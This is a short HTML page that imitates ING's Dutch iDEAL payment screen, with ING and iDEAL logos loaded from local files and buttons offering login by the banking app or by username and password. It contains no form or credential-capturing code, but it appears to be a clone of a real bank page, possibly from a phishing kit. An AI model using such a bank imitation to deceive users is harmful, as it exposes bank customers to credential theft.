<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	
    <title>iDEAL - Mijn ING</title>

  </head>
  <body>
    
<div class="container " style="width:55%">
<div class="row">
<div class="col-3 m-3">

<img src="ing-logo.svg">
</div>
<div class="col m-0 p-0">
<img src="logo-ideal.svg" width="70px" height="50px">
</div>
</div>
<div class="row">
<div class="col">
<h3 style="font-weight:700; color:#ff6200; " >Hoe wilt u betalen?</h3>

</div>
</div>
<div class="row">
<div class="col">
<p style="font-size: 18px;
    font-size: 1rem;
    font-weight: 400;
    line-height: 1.8;
    color: #333;
    margin: 0 auto;
	margin-bottom:25px;">Om met iDEAL te betalen, gebruikt u de ING Bankieren app of logt u in op Mijn ING met uw gebruikersnaam en wachtwoord.</p>

</div>
</div>

<div class="row">
<div class="col">

<button type="button" class="btn btn-lg btn-block btn-outline-light" style="border-radius:8px; font-size:18px; font-weight:700; background-color:#ff6200; color:white">ING Bankieren app</button>
<button type="button" class="btn btn-lg btn-block mt-1 btn-outline-light" style="border-radius:8px; font-size:18px; font-weight:700; background-color:#f5f5f5; color:#ff6200;">Gebruikersnaam en wachtwoord</button>
<button type="button" class="btn btn-lg btn-outline-light btn-block mt-5" style="border-radius:8px; font-size:18px; font-weight:700; background-color:#f5f5f5; color:#333;">Annuleren</button>


<i class="fa fa-chevron-right mt-3" style="color:#ff6200"></i>
<a href="#" >Help</a>


</div>
</div>

</div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>
</html>